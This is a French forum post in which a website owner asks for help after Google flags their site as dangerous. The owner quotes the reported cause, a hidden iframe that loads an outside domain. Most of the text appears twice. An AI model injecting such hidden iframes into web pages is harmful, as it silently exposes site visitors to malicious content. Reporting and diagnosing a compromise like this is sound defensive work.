Depuis le 13/10/13 mon site apparaît comme dangereux aux yeux de mes visiteurs. Après une recherche plus en détail, je remarque que google m'indique qu'une iframe est à l'origine du problème :
Après avoir scanné mon hébergement de font en comble, je remarque qu'aucun code n'est trouvé. Je cherche donc dans la BDD: toujours rien.
Serait-il possible qu'un autre site du même serveur que moi ai provoqué ce dysfonctionnement sur mon site ?
Voila le rapport google :
C'est très frustrant de se dire qu'un ce moment je perds en crédibilité vis-a-vis de mes visiteurs alors que je ne suis pas responsable de ce hack..
Merci d'avance pour votre aide.
Code:
<iframe style="visibility: hidden; display: none; display: none;" src="http://androidczad.info/">
Après avoir scanné mon hébergement de font en comble, je remarque qu'aucun code n'est trouvé. Je cherche donc dans la BDD: toujours rien.
Serait-il possible qu'un autre site du même serveur que moi ai provoqué ce dysfonctionnement sur mon site ?
Voila le rapport google :
C'est très frustrant de se dire qu'un ce moment je perds en crédibilité vis-a-vis de mes visiteurs alors que je ne suis pas responsable de ce hack..
Merci d'avance pour votre aide.